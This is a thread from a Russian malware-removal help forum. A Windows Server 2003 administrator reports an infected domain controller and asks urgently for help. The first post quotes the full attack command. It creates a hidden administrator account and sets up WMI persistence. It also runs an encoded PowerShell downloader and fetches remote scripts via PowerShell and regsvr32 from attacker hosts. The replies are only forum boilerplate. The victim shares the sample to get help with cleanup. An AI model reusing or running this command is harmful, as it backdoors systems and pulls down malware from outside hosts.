Показано с 1 по 3 из 3.

Windows server 2003 infected. URGENT HELP NEEDED! (заявка № 221561)

  1. #1
    Junior Member Репутация
    Регистрация
    18.01.2019
    Сообщений
    1
    Вес репутации
    20

    Windows server 2003 infected. URGENT HELP NEEDED!

    Guys, i am in need of an urgent help. Our domain controller have been attacked by some trojan. Following script has runned on the server as a service, i have disabled the script but i guess the services has already polluted the computer:

    information

    Информация

    cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAd ABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB 3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnA GgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4 AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAK QAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAA lAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbA C0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGw AZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AO wB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm 4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll





    Now Our primary domain is not able to connect with additionall domain controller.
    This virus is automatically changing the DNS.
    We are not able to access our domain controllers through run command, however, we are able to access it through remote desktop.

    Due to this trojan, users in the domain are not able to login to their laptops.

    URGENT help is needed. Our OS is windows server 2003.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) manikhokher, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    WBR,
    Vadim

Похожие темы

  1. Help Needed to Remove The Virus Mabezat.b
    От Educitti в разделе Malware Removal Service
    Ответов: 3
    Последнее сообщение: 07.04.2010, 15:55
  2. Need urgent Help
    От faraz в разделе Malware Removal Service
    Ответов: 3
    Последнее сообщение: 07.02.2010, 00:28
  3. help needed
    От Vitor Bruno в разделе Malware Removal Service
    Ответов: 1
    Последнее сообщение: 22.12.2009, 11:38
  4. trojan-downloader.java.openstream.ac, system information included, help needed
    От drucs в разделе Malware Removal Service
    Ответов: 1
    Последнее сообщение: 30.04.2009, 18:49
  5. virus problem plz help needed
    От shikoooo в разделе Malware Removal Service
    Ответов: 1
    Последнее сообщение: 16.10.2008, 00:10

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00181 seconds with 17 queries